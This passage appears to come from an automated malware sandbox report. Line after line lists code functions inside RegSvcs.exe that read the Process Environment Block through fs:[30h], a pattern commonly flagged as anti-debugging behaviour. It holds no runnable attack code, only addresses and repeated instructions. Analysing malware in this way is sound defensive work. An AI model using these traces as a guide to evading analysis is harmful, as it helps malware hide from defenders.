Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C9100 mov eax, dword ptr fs:[00000030h]	8_2_018C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h]	8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h]	8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h]	8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h]	8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E4120 mov ecx, dword ptr fs:[00000030h]	8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F513A mov eax, dword ptr fs:[00000030h]	8_2_018F513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F513A mov eax, dword ptr fs:[00000030h]	8_2_018F513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EB944 mov eax, dword ptr fs:[00000030h]	8_2_018EB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EB944 mov eax, dword ptr fs:[00000030h]	8_2_018EB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CC962 mov eax, dword ptr fs:[00000030h]	8_2_018CC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CB171 mov eax, dword ptr fs:[00000030h]	8_2_018CB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CB171 mov eax, dword ptr fs:[00000030h]	8_2_018CB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C9080 mov eax, dword ptr fs:[00000030h]	8_2_018C9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01943884 mov eax, dword ptr fs:[00000030h]	8_2_01943884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01943884 mov eax, dword ptr fs:[00000030h]	8_2_01943884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h]	8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h]	8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h]	8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h]	8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h]	8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h]	8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FF0BF mov ecx, dword ptr fs:[00000030h]	8_2_018FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FF0BF mov eax, dword ptr fs:[00000030h]	8_2_018FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FF0BF mov eax, dword ptr fs:[00000030h]	8_2_018FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019090AF mov eax, dword ptr fs:[00000030h]	8_2_019090AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0195B8D0 mov ecx, dword ptr fs:[00000030h]	8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h]	8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C58EC mov eax, dword ptr fs:[00000030h]	8_2_018C58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EB8E4 mov eax, dword ptr fs:[00000030h]	8_2_018EB8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EB8E4 mov eax, dword ptr fs:[00000030h]	8_2_018EB8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C40E1 mov eax, dword ptr fs:[00000030h]	8_2_018C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C40E1 mov eax, dword ptr fs:[00000030h]	8_2_018C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C40E1 mov eax, dword ptr fs:[00000030h]	8_2_018C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01947016 mov eax, dword ptr fs:[00000030h]	8_2_01947016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01947016 mov eax, dword ptr fs:[00000030h]	8_2_01947016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01947016 mov eax, dword ptr fs:[00000030h]	8_2_01947016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01994015 mov eax, dword ptr fs:[00000030h]	8_2_01994015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01994015 mov eax, dword ptr fs:[00000030h]	8_2_01994015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h]	8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h]	8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h]	8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h]	8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h]	8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h]	8_2_018DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h]	8_2_018DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h]	8_2_018DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h]	8_2_018DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h]	8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h]	8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h]	8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h]	8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E0050 mov eax, dword ptr fs:[00000030h]	8_2_018E0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E0050 mov eax, dword ptr fs:[00000030h]	8_2_018E0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01982073 mov eax, dword ptr fs:[00000030h]	8_2_01982073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01991074 mov eax, dword ptr fs:[00000030h]	8_2_01991074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D1B8F mov eax, dword ptr fs:[00000030h]	8_2_018D1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D1B8F mov eax, dword ptr fs:[00000030h]	8_2_018D1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198138A mov eax, dword ptr fs:[00000030h]	8_2_0198138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0197D380 mov ecx, dword ptr fs:[00000030h]	8_2_0197D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F2397 mov eax, dword ptr fs:[00000030h]	8_2_018F2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FB390 mov eax, dword ptr fs:[00000030h]	8_2_018FB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F4BAD mov eax, dword ptr fs:[00000030h]	8_2_018F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F4BAD mov eax, dword ptr fs:[00000030h]	8_2_018F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F4BAD mov eax, dword ptr fs:[00000030h]	8_2_018F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01995BA5 mov eax, dword ptr fs:[00000030h]	8_2_01995BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019453CA mov eax, dword ptr fs:[00000030h]	8_2_019453CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019453CA mov eax, dword ptr fs:[00000030h]	8_2_019453CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EDBE9 mov eax, dword ptr fs:[00000030h]	8_2_018EDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h]	8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h]	8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h]	8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h]	8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h]	8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h]	8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198131B mov eax, dword ptr fs:[00000030h]	8_2_0198131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01998B58 mov eax, dword ptr fs:[00000030h]	8_2_01998B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CDB40 mov eax, dword ptr fs:[00000030h]	8_2_018CDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CF358 mov eax, dword ptr fs:[00000030h]	8_2_018CF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CDB60 mov ecx, dword ptr fs:[00000030h]	8_2_018CDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F3B7A mov eax, dword ptr fs:[00000030h]	8_2_018F3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F3B7A mov eax, dword ptr fs:[00000030h]	8_2_018F3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FD294 mov eax, dword ptr fs:[00000030h]	8_2_018FD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FD294 mov eax, dword ptr fs:[00000030h]	8_2_018FD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h]	8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h]	8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h]	8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h]	8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h]	8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018DAAB0 mov eax, dword ptr fs:[00000030h]	8_2_018DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018DAAB0 mov eax, dword ptr fs:[00000030h]	8_2_018DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FFAB0 mov eax, dword ptr fs:[00000030h]	8_2_018FFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F2ACB mov eax, dword ptr fs:[00000030h]	8_2_018F2ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F2AE4 mov eax, dword ptr fs:[00000030h]	8_2_018F2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D8A0A mov eax, dword ptr fs:[00000030h]	8_2_018D8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198AA16 mov eax, dword ptr fs:[00000030h]	8_2_0198AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198AA16 mov eax, dword ptr fs:[00000030h]	8_2_0198AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018E3A1C mov eax, dword ptr fs:[00000030h]	8_2_018E3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CAA16 mov eax, dword ptr fs:[00000030h]	8_2_018CAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018CAA16 mov eax, dword ptr fs:[00000030h]	8_2_018CAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C5210 mov eax, dword ptr fs:[00000030h]	8_2_018C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C5210 mov ecx, dword ptr fs:[00000030h]	8_2_018C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C5210 mov eax, dword ptr fs:[00000030h]	8_2_018C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C5210 mov eax, dword ptr fs:[00000030h]	8_2_018C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]	8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]	8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]	8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]	8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]	8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]	8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]	8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]	8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]	8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01904A2C mov eax, dword ptr fs:[00000030h]	8_2_01904A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01904A2C mov eax, dword ptr fs:[00000030h]	8_2_01904A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01954257 mov eax, dword ptr fs:[00000030h]	8_2_01954257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h]	8_2_018C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h]	8_2_018C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h]	8_2_018C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h]	8_2_018C9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198EA55 mov eax, dword ptr fs:[00000030h]	8_2_0198EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0190927A mov eax, dword ptr fs:[00000030h]	8_2_0190927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0197B260 mov eax, dword ptr fs:[00000030h]	8_2_0197B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0197B260 mov eax, dword ptr fs:[00000030h]	8_2_0197B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01998A62 mov eax, dword ptr fs:[00000030h]	8_2_01998A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h]	8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h]	8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h]	8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h]	8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h]	8_2_018C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h]	8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h]	8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h]	8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h]	8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FFD9B mov eax, dword ptr fs:[00000030h]	8_2_018FFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018FFD9B mov eax, dword ptr fs:[00000030h]	8_2_018FFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F35A1 mov eax, dword ptr fs:[00000030h]	8_2_018F35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019905AC mov eax, dword ptr fs:[00000030h]	8_2_019905AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_019905AC mov eax, dword ptr fs:[00000030h]	8_2_019905AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h]	8_2_018F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h]	8_2_018F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h]	8_2_018F1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]	8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]	8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]	8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01946DC9 mov ecx, dword ptr fs:[00000030h]	8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]	8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]	8_2_01946DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01978DF1 mov eax, dword ptr fs:[00000030h]	8_2_01978DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018DD5E0 mov eax, dword ptr fs:[00000030h]	8_2_018DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018DD5E0 mov eax, dword ptr fs:[00000030h]	8_2_018DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h]	8_2_0198FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h]	8_2_0198FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h]	8_2_0198FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198FDE2 mov eax, dword ptr fs:[00000030h]	8_2_0198FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0198E539 mov eax, dword ptr fs:[00000030h]	8_2_0198E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0194A537 mov eax, dword ptr fs:[00000030h]	8_2_0194A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_01998D34 mov eax, dword ptr fs:[00000030h]	8_2_01998D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h]	8_2_018F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h]	8_2_018F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018F4D3B mov eax, dword ptr fs:[00000030h]	8_2_018F4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]	8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]	8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]	8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]	8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]	8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]	8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]	8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]	8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]	8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h]	8_2_018D3D34
